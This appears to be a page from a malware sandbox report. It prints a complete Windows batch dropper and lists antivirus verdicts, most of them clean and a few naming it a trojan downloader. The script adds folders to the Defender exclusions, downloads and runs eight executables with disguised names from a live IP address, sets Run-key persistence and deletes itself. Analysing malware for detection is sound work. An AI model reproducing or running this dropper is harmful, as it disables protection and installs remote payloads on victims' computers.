popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
@echo off
REM Create a directory in C:\RM
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'"
REM Exclude the C:\RM directory from Windows Defender scans
powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'"
REM Download the main.exe file to the C:\RM directory
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'"
REM Run the downloaded main.exe file
start "" "C:\RM\AntiVirus.exe"
start "" "C:\RM\AntiVirus2.exe"
start "" "C:\RM\AntiVirus3.exe"
start "" "C:\RM\AntiVirus4.exe"
start "" "C:\ProgramLogs\MicrosoftNetwork.exe"
start "" "C:\ProgramLogs\MicrosoftRegistry.exe"
start "" "C:\ProgramLogs\MicrosoftSecurity.exe"
start "" "C:\ProgramLogs\MicrosoftValidator.exe"
REM Add entry to the Windows Registry to run main.exe at startup
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f
REM Clean up temporary files (optional)
REM del %TEMP%\lander2.vbs
REM Exit the script
(goto) 2>nul & del "%~f0"
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Backdoor.zq
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.GEI
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.MNT.Boxter.928.2802D7D3
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.MNT.Boxter.928.2802D7D3
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.MNT.Boxter.928.2802D7D3
TrendMicro Clean
FireEye Heur.BZC.MNT.Boxter.928.2802D7D3
Emsisoft Heur.BZC.MNT.Boxter.928.2802D7D3 (B)
GData Heur.BZC.MNT.Boxter.928.2A4E69C7
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=81)
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.MNT.Boxter.928.2802D7D3 [many]
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
CrowdStrike Clean
alibabacloud Trojan[downloader]:Win/BZC.MTB
No IRMA results available.